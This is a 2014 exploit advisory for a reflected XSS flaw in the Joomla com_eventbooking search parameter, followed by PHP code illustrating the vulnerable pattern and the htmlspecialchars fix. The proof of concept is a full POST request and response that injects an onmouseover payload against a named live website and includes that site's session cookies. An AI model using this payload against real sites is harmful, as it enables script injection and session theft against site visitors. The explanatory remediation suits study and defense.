##################################################################################################
#Exploit Title : Joomla com_eventbooking component XSS vulnerability
#Author : Jagriti Sahu AKA incredible
#Download Link : https://github.com/Jasonudoo/platform/tree/master/components/com_eventbooking
#Date : 13/11/2014
#Discovered at : IndiShell Lab
#Love to : Surbhi, Mrudula and Harry
#Discovered At : Indishell Lab
##################################################################################################

////////////////////////
/// Overview:
////////////////////////

The Joomla component com_eventbooking does not filter the data in its search parameter and is therefore affected by an XSS vulnerability.

///////////////////////////////
// Vulnerability Description:
///////////////////////////////

The vulnerability is due to the search parameter of the search box, which is not filtered and is therefore prone to XSS.

////////////////
/// POC ////
///////////////

POC image=http://oi61.tinypic.com/aol6qc.jpg

http://eastvicevents.com.au/index.php?option=com_eventbooking&Itemid=101

POST /index.php?option=com_eventbooking&Itemid=101 HTTP/1.1
Host: eastvicevents.com.au
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://eastvicevents.com.au/index.php?option=com_eventbooking&Itemid=101
Cookie: 230d19898da30be54648f536cbac3652=ca2096bf2055cf7c31462f8f056f84d4; __utma=222259084.1320908457.1415891642.1415891642.1415891642.1; __utmb=222259084.18.10.1415891642; __utmc=222259084; __utmz=222259084.1415891642.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 177

search=test" onmouseover=prompt(String.fromCharCode(120,115,115,32,116,101,115,116,105,110,103));//&category_id=13&location_id=474&option=com_eventbooking&Itemid=101&view=search

HTTP/1.1 200 OK
Content-Encoding: gzip
Vary: Accept-Encoding
Date: Thu, 13 Nov 2014 16:10:17 GMT
Server: LiteSpeed
X-Powered-By: PHP/5.5.18
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Connection: close
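The root cause the advisory describes, the search term being written back into the search form without encoding, as an added illustration in PHP. This is not the com_eventbooking source and not the author's code: `renderSearchBoxVulnerable`, `renderSearchBoxEscaped` and the sample input are constructed for this example. The fix shown is plain `htmlspecialchars`; in a Joomla view template the component would reach the same result through the framework's `$this->escape()` helper, which wraps that function.

```php
<?php
// Added example, not the com_eventbooking source. Shows why an unencoded
// search term breaks out of the value="" attribute of the search box,
// and the attribute-context encoding that closes the hole.

// Vulnerable pattern: the raw request value is concatenated into HTML.
function renderSearchBoxVulnerable(string $search): string
{
    return '<input type="text" name="search" value="' . $search . '">';
}

// Hardened pattern: encode for an HTML attribute context before output.
// ENT_QUOTES turns both " and ' into entities, so a quote in the input can
// no longer terminate the attribute; ENT_SUBSTITUTE keeps invalid UTF-8
// from making the function return an empty string.
function renderSearchBoxEscaped(string $search): string
{
    $safe = htmlspecialchars($search, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="search" value="' . $safe . '">';
}

// Constructed sample input shaped like the advisory's POST body: a double
// quote followed by an event-handler attribute.
$sample = 'test" onmouseover=prompt(1)//';

echo renderSearchBoxVulnerable($sample), PHP_EOL;
echo renderSearchBoxEscaped($sample), PHP_EOL;
```

With the sample input, the first function emits a tag in which the quote closes `value` and `onmouseover=...` lands in the tag as a live attribute, which is exactly the behaviour the POC request relies on. The second function emits the quote as `&quot;`, so the whole term stays inside `value` and the browser treats it as text. Encoding at the output point is the durable fix; blocking specific strings in the request (the `onmouseover` or `prompt` seen here) only removes one payload shape.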